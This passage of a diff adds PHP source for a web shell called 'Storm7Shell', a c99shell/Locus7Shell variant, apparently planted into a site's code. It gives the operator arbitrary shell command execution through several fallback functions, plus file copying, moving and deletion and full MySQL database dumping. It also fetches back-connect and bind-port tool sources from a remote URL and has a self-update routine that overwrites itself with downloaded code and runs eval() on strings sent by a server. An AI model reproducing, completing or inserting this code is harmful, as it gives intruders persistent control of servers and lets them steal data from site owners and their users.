+  return substr($content, 0,$len)."...".substr($content,-$len); 
+ } 
+ else {return $content;} 
+} 
+} 
+if (!function_exists("view_size")) 
+{ 
+function view_size($size) 
+{ 
+ if (!is_numeric($size)) {return FALSE;} 
+ else 
+ { 
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} 
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} 
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} 
+  else {$size = $size . " B";} 
+  return $size; 
+ } 
+} 
+} 
+if (!function_exists("fs_copy_dir")) 
+{ 
+function fs_copy_dir($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+ $h = opendir($d); 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   if (!$ret) {return $ret;} 
+  } 
+ } 
+ closedir($h); 
+ return TRUE; 
+} 
+} 
+if (!function_exists("fs_copy_obj")) 
+{ 
+function fs_copy_obj($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); 
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));} 
+ if (is_dir($d)) 
+ { 
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} 
+  return fs_copy_dir($d,$t); 
+ } 
+ elseif (is_file($d)) {return copy($d,$t);} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("fs_move_dir")) 
+{ 
+function fs_move_dir($d,$t) 
+{ 
+ $h = opendir($d); 
+ if (!is_dir($t)) {mkdir($t);} 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   $ret = TRUE; 
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} 
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} 
+   if (!$ret) {return $ret;} 
+  } 
+ } 
+ closedir($h); 
+ return TRUE; 
+} 
+} 
+if (!function_exists("fs_move_obj")) 
+{ 
+function fs_move_obj($d,$t) 
+{ 
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); 
+ if (is_dir($d)) 
+ { 
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} 
+  return fs_move_dir($d,$t); 
+ } 
+ elseif (is_file($d)) 
+ { 
+  if(copy($d,$t)) {return unlink($d);} 
+  else {unlink($t); return FALSE;} 
+ } 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("fs_rmdir")) 
+{ 
+function fs_rmdir($d) 
+{ 
+ $h = opendir($d); 
+ while (($o = readdir($h)) !== FALSE) 
+ { 
+  if (($o != ".") and ($o != "..")) 
+  { 
+   if (!is_dir($d.$o)) {unlink($d.$o);} 
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} 
+  } 
+ } 
+ closedir($h); 
+ rmdir($d); 
+ return !is_dir($d); 
+} 
+} 
+if (!function_exists("fs_rmobj")) 
+{ 
+function fs_rmobj($o) 
+{ 
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); 
+ if (is_dir($o))
+ { 
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} 
+  return fs_rmdir($o); 
+ } 
+ elseif (is_file($o)) {return unlink(html_entity_decode($o));} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("myshellexec")) 
+{ 
+function myshellexec($cmd) 
+{ 
+ global $disablefunc; 
+ $result = ""; 
+ if (!empty($cmd)) 
+ { 
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} 
+  elseif (($result = `$cmd`) !== FALSE) {} 
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} 
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} 
+  elseif (is_resource($fp = popen($cmd,"r"))) 
+  { 
+   $result = ""; 
+   while(!feof($fp)) {$result .= fread($fp,1024);} 
+   pclose($fp); 
+  } 
+ } 
+ return $result; 
+} 
+} 
+if (!function_exists('tabsort')) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} 
+if (!function_exists('view_perms')) 
+{ 
+function view_perms($mode) 
+{ 
+ if (($mode & 0xC000) === 0xC000) {$type = "s";} 
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";} 
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";} 
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";} 
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";} 
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";} 
+ else {$type = "?";} 
+
+ $owner["read"] = ($mode & 00400)?"r":"-"; 
+ $owner["write"] = ($mode & 00200)?"w":"-"; 
+ $owner["execute"] = ($mode & 00100)?"x":"-"; 
+ $group["read"] = ($mode & 00040)?"r":"-"; 
+ $group["write"] = ($mode & 00020)?"w":"-"; 
+ $group["execute"] = ($mode & 00010)?"x":"-"; 
+ $world["read"] = ($mode & 00004)?"r":"-"; 
+ $world["write"] = ($mode & 00002)? "w":"-"; 
+ $world["execute"] = ($mode & 00001)?"x":"-"; 
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} 
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} 
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} 
+
+ return $type.join("",$owner).join("",$group).join("",$world); 
+} 
+} 
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} 
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} 
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} 
+if (!function_exists("parse_perms")) 
+{ 
+function parse_perms($mode) 
+{ 
+ if (($mode & 0xC000) === 0xC000) {$t = "s";} 
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";} 
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";} 
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";} 
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";} 
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";} 
+ else {$t = "?";} 
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; 
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; 
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; 
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); 
+} 
+} 
+if (!function_exists("parsesort")) 
+{ 
+function parsesort($sort) 
+{ 
+ $one = intval($sort); 
+ $second = substr($sort,-1); 
+ if ($second != "d") {$second = "a";} 
+ return array($one,$second); 
+} 
+} 
+if (!function_exists("view_perms_color")) 
+{ 
+function view_perms_color($o) 
+{ 
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";} 
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";} 
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";} 
+} 
+} 
+if (!function_exists("c99getsource")) 
+{ 
+function c99getsource($fn) 
+{ 
+ global $c99sh_sourcesurl; 
+ $array = array( 
+  "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", 
+  "c99sh_bindport.c" => "c99sh_bindport_c.txt", 
+  "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", 
+  "c99sh_backconn.c" => "c99sh_backconn_c.txt", 
+  "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", 
+  "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", 
+ ); 
+ $name = $array[$fn]; 
+ if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("c99sh_getupdate")) 
+{ 
+function c99sh_getupdate($update = TRUE) 
+{ 
+ $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; 
+ $data = @file_get_contents($url); 
+ if (!$data) {return "Can't connect to update-server!";} 
+ else 
+ { 
+  $data = ltrim($data); 
+  $string = substr($data,3,ord($data{2})); 
+  if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} 
+  if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} 
+  if ($data{0} == "\x99" and $data{1} == "\x03") 
+  { 
+   $string = explode("\x01",$string); 
+   if ($update) 
+   { 
+    $confvars = array(); 
+    $sourceurl = $string[0]; 
+    $source = file_get_contents($sourceurl); 
+    if (!$source) {return "Can't fetch update!";} 
+    else 
+    { 
+     $fp = fopen(__FILE__,"w"); 
+     if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";} 
+     else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} 
+    } 
+   } 
+   else {return "New version are available: ".$string[1];} 
+  } 
+  elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} 
+  else {return "Error in protocol: segmentation failed! (".$data.") ";} 
+ } 
+} 
+} 
+if (!function_exists("mysql_dump")) 
+{ 
+function mysql_dump($set) 
+{ 
+ global $shver; 
+ $sock = $set["sock"]; 
+ $db = $set["db"]; 
+ $print = $set["print"]; 
+ $nl2br = $set["nl2br"]; 
+ $file = $set["file"]; 
+ $add_drop = $set["add_drop"]; 
+ $tabs = $set["tabs"]; 
+ $onlytabs = $set["onlytabs"]; 
+ $ret = array(); 
+ $ret["err"] = array(); 
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} 
+ if (empty($db)) {$db = "db";} 
+ if (empty($print)) {$print = 0;} 
+ if (empty($nl2br)) {$nl2br = 0;} 
+ if (empty($add_drop)) {$add_drop = TRUE;} 
+ if (empty($file)) 
+ { 
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; 
+ } 
+ if (!is_array($tabs)) {$tabs = array();} 
+ if (empty($add_drop)) {$add_drop = TRUE;} 
+ if (sizeof($tabs) == 0) 
+ { 
+  // retrive tables-list 
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock); 
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} 
+ } 
+ $out = "# Dumped by Locous7Shell.SQL v. ".$shver." 
+# Home page: http://www.Locus7s.com 
+# 
+# Host settings: 
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." 
+# Date: ".date("d.m.Y H:i:s")." 
+# DB: \"".$db."\" 
+#--------------------------------------------------------- 
+"; 
+ $c = count($onlytabs); 
+ foreach($tabs as $tab) 
+ { 
+  if ((in_array($tab,$onlytabs)) or (!$c)) 
+  { 
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} 
+   // recieve query for create table structure 
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); 
+   if (!$res) {$ret["err"][] = mysql_smarterror();} 
+   else 
+   { 
+    $row = mysql_fetch_row($res); 
+    $out .= $row["1"].";\n\n"; 
+    // recieve table variables 
+    $res = mysql_query("SELECT * FROM `$tab`", $sock); 
+    if (mysql_num_rows($res) > 0) 
+    { 
+     while ($row = mysql_fetch_assoc($res)) 
+     { 
+      $keys = implode("`, `", array_keys($row)); 
+      $values = array_values($row); 
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+      $values = implode("', '", $values); 
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+      $out .= $sql; 
+     } 
+    } 
+   } 
+  } 
+ } 
+ $out .= "#---------------------------------------------------------------------------------\n\n"; 
+ if ($file) 
+ { 
+  $fp = fopen($file, "w"); 
+  if (!$fp) {$ret["err"][] = 2;} 
+  else 
+  { 
+   fwrite ($fp, $out); 
+   fclose ($fp); 
+  } 
+ } 
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} 
+ return $out; 
+} 
+} 
+if (!function_exists("mysql_buildwhere")) 
+{ 
+function mysql_buildwhere($array,$sep=" and",$functs=array()) 
+{ 
+ if (!is_array($array)) {$array = array();} 
+ $result = ""; 
+ foreach($array as $k=>$v) 
+ { 
+  $value = ""; 
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";} 
+  $value .= "'".addslashes($v)."'"; 
+  if (!empty($functs[$k])) {$value .= ")";} 
+  $result .= "`".$k."` = ".$value.$sep; 
+ } 
+ $result = substr($result,0,strlen($result)-strlen($sep)); 
+ return $result; 
+} 
+} 
+if (!function_exists("mysql_fetch_all")) 
+{ 
+function mysql_fetch_all($query,$sock) 
+{ 
+ if ($sock) {$result = mysql_query($query,$sock);} 
+ else {$result = mysql_query($query);} 
+ $array = array(); 
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;} 
+ mysql_free_result($result); 
+ return $array; 
+} 
+} 
+if (!function_exists("mysql_smarterror")) 
+{ 
+function mysql_smarterror($type,$sock) 
+{ 
+ if ($sock) {$error = mysql_error($sock);} 
+ else {$error = mysql_error();} 
+ $error = htmlspecialchars($error); 
+ return $error; 
+} 
+} 
+if (!function_exists("mysql_query_form")) 
+{ 
+function mysql_query_form() 
+{ 
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; 
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} 
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} 
+ if ((!$submit) or ($sql_act)) 
+ { 
+  echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>"; 
+  if ($tbl_struct) 
+  { 
+   echo "<td valign=\"top\"><b>Fields:</b><br>"; 
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";} 
+   echo "</td></tr></table>"; 
+  } 
+ } 
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} 
+} 
+} 
+if (!function_exists("mysql_create_db")) 
+{ 
+function mysql_create_db($db,$sock="") 
+{ 
+ $sql = "CREATE DATABASE `".addslashes($db)."`;"; 
+ if ($sock) {return mysql_query($sql,$sock);} 
+ else {return mysql_query($sql);} 
+} 
+} 
+if (!function_exists("mysql_query_parse")) 
+{ 
+function mysql_query_parse($query) 
+{ 
+ $query = trim($query); 
+ $arr = explode (" ",$query); 
+ /*array array() 
+ { 
+  "METHOD"=>array(output_type), 
+  "METHOD1"... 
+  ... 
+ } 
+ if output_type == 0, no output, 
+ if output_type == 1, no output if no error 
+ if output_type == 2, output without control-buttons 
+ if output_type == 3, output with control-buttons 
+ */ 
+ $types = array( 
+  "SELECT"=>array(3,1), 
+  "SHOW"=>array(2,1), 
+  "DELETE"=>array(1), 
+  "DROP"=>array(1) 
+ ); 
+ $result = array(); 
+ $op = strtoupper($arr[0]); 
+ if (is_array($types[$op])) 
+ { 
+  $result["propertions"] = $types[$op]; 
+  $result["query"]  = $query; 
+  if ($types[$op] == 2) 
+  { 
+   foreach($arr as $k=>$v) 
+   { 
+    if (strtoupper($v) == "LIMIT") 
+    { 
+     $result["limit"] = $arr[$k+1]; 
+     $result["limit"] = explode(",",$result["limit"]); 
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} 
+     unset($arr[$k],$arr[$k+1]); 
+    } 
+   } 
+  } 
+ } 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("c99fsearch")) 
+{ 
+function c99fsearch($d) 
+{ 
+ global $found; 
+ global $found_d; 
+ global $found_f; 
+ global $search_i_f; 
+ global $search_i_d; 
+ global $a; 
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+ $h = opendir($d); 
+ while (($f = readdir($h)) !== FALSE) 
+ { 
+  if($f != "." && $f != "..") 
+  { 
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); 
+   if (is_dir($d.$f)) 
+   { 
+    $search_i_d++; 
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} 
+    if (!is_link($d.$f)) {c99fsearch($d.$f);} 
+   } 
+   else 
+   { 
+    $search_i_f++; 
+    if ($bool) 
+    { 
+     if (!empty($a["text"])) 
+     { 
+      $r = @file_get_contents($d.$f); 
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} 
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} 
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} 
+      else {$bool = strpos(" ".$r,$a["text"],1);} 
+      if ($a["text_not"]) {$bool = !$bool;} 
+      if ($bool) {$found[] = $d.$f; $found_f++;} 
+     } 
+     else {$found[] = $d.$f; $found_f++;} 
+    } 
+   } 
+  } 
+ } 
+ closedir($h); 
+} 
+} 
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} 
+//Sending headers 
+@ob_start(); 
+@ob_implicit_flush(0); 
+function onphpshutdown() 
+{ 
+ global $gzipencode,$ft; 
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) 
+ { 
+  $v = @ob_get_contents(); 
+  @ob_end_clean(); 
+  @ob_start("ob_gzHandler"); 
+  echo $v; 
+  @ob_end_flush(); 
+ } 
+} 
+function c99shexit() 
+{ 
+ onphpshutdown(); 
+ exit; 
+} 
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); 
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); 
+header("Cache-Control: no-store, no-cache, must-revalidate"); 
+header("Cache-Control: post-check=0, pre-check=0", FALSE); 
+header("Pragma: no-cache"); 
+if (empty($tmpdir)) 
+{ 
+ $tmpdir = ini_get("upload_tmp_dir"); 
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} 
+} 
+$tmpdir = realpath($tmpdir); 
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); 
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} 
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} 
+else {$tmpdir_logs = realpath($tmpdir_logs);} 
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") 
+{ 
+ $safemode = TRUE; 
+ $hsafemode = "<font color=red>ON (secure)</font>"; 
+} 
+else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";} 
+$v = @ini_get("open_basedir"); 
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";} 
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";} 
+$sort = htmlspecialchars($sort); 
+if (empty($sort)) {$sort = $sort_default;} 
+$sort[1] = strtolower($sort[1]); 
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); 
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} 
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE)); 
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF 
+@ini_set("highlight.comment",$highlight_comment); //#FF8000 
+@ini_set("highlight.default",$highlight_default); //#0000BB 
+@ini_set("highlight.html",$highlight_html); //#000000 
+@ini_set("highlight.keyword",$highlight_keyword); //#007700 
+@ini_set("highlight.string",$highlight_string); //#DD0000 
+if (!is_array($actbox)) {$actbox = array();} 
+$dspact = $act = htmlspecialchars($act); 
+$disp_fullpath = $ls_arr = $notls = null; 
+$ud = urlencode($d); 
+// took the disabled functions from r57shell
+?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - Storm7Shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #cc7700; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #cc7700; scrollbar-shadow-color: #000000; scrollbar-highlight-color: #00CC00; scrollbar-3dlight-color: #00CC00; scrollbar-darkshadow-color: #cc7700; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #000000; COLOR: green; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #cc7700; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #f89521; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #f89521; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #f89521; TEXT-DECORATION: none;}A:hover { COLOR: #f89521; TEXT-DECORATION: bold;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #cc7700; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #cc7700; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #cc7700; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #cc7700; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #cc7700; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #cc7700; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #cc7700; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #cc7700;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><center><img src='http://img232.imageshack.us/img232/9944/storm7shellnl0.png'></p></center></th></tr><tr><td>
+<table border=0 width=100%>
+<tr><td colspan=2><center><b><?php echo $DISP_SERVER_SOFTWARE; ?></td></tr>
+<tr><td><b>Kernel: <?php echo wordwrap(php_uname(),90,'<br>',1); if($win) echo ' ('.exec('ver').')'; ?></b></td><td align=right><b>Safe-Mode: <?php echo $hsafemode; ?></b></td></tr>
+<tr><td><b><?php if (!$win) {echo wordwrap(myshellexec('id'),90,'<br>',1);} else {echo 'Running As: '.get_current_user();} ?></b></td><td align=right><b>Disabled PHP Functions: <?php if(''==($df=@ini_get('disable_functions'))){echo '<font color=green>NONE</font></b>';}else{echo '<font color=red>$df</font></b>';} ?></b></td></tr>
+<tr><td><?php
+
+// ***
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} 
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+$d = str_replace("\\\\","\\",$d); 
+$dispd = htmlspecialchars($d); 
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); 
+$i = 0; 
+// ***
+
+if (is_callable('disk_free_space')) 
+{
+ $free = disk_free_space($d);
+ $total = disk_total_space($d);
+ if ($free === FALSE) {$free = 0;}
+ if ($total === FALSE) {$total = 0;}
+ if ($free < 0) {$free = 0;}
+ if ($total < 0) {$total = 0;}
+ $used = $total-$free;
+ $free_percent = round(100/($total/$free),2);
+ echo '<b>Free '.view_size($free).' of '.view_size($total).' ('.$free_percent.'%)</b>';
+}
+echo '</td><td align=right><b>Server IP: <a href=http://whois.domaintools.com/'.gethostbyname($_SERVER["HTTP_HOST"]).'>'.gethostbyname($_SERVER["HTTP_HOST"]).'</a> - Your IP: <a href=http://whois.domaintools.com/'.$_SERVER["REMOTE_ADDR"].'>'.$_SERVER["REMOTE_ADDR"].'</a></b></td></tr>';
+?>
+</table>
+<br>
+<p align="left"><?php 
+// moved the dir stuff up above the disk free space so that it still gets the variables, even though it's being called before the echo current dir (put *** around it)
+foreach($pd as $b) 
+{ 
+ $t = ''; 
+ $j = 0; 
+ foreach ($e as $r) 
+ { 
+  $t.= $r.DIRECTORY_SEPARATOR; 
+  if ($j == $i) {break;} 
+  $j++; 
+ } 
+ echo '<a href="'.$surl.'act=ls&d='.urlencode($t).'&sort='.$sort.'"><b>'.htmlspecialchars($b).DIRECTORY_SEPARATOR.'</b></a>'; 
+ $i++; 
+}
+echo '&nbsp;&nbsp;&nbsp;';
+if (is_writable($d)) 
+{ 
+ $wd = TRUE; 
+ $wdt = "<font color=green>[ ok ]</font>"; 
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>"; 
+} 
+else 
+{ 
+ $wd = FALSE; 
+ $wdt = "<font color=red>[ Read-Only ]</font>"; 
+ echo '<b>'.view_perms_color($d).'</b>'; 
+}
+
+echo '<br>';
+$letters = ''; 
+if ($win) 
+{ 
+ $v = explode("\\",$d); 
+ $v = $v[0]; 
+ foreach (range('a','z') as $letter) 
+ { 
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
+  if (!$bool) {$bool = is_dir($letter.":\\");}
+  if ($bool)
+  {
+   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode(strtoupper($letter).":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">["; 
+   if ($letter.":" != $v) {$letters .= strtoupper($letter);}
+   else {$letters .= '<font color=green>'.strtoupper($letter).'</font>';}
+   $letters .= ":]</a> "; 
+  } 
+ } 
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";} 
+} 
+if (count($quicklaunch) > 0) 
+{ 
+ foreach($quicklaunch as $item) 
+ { 
+  $item[1] = str_replace("%d",urlencode($d),$item[1]); 
+  $item[1] = str_replace("%sort",$sort,$item[1]); 
+  $v = realpath($d.".."); 
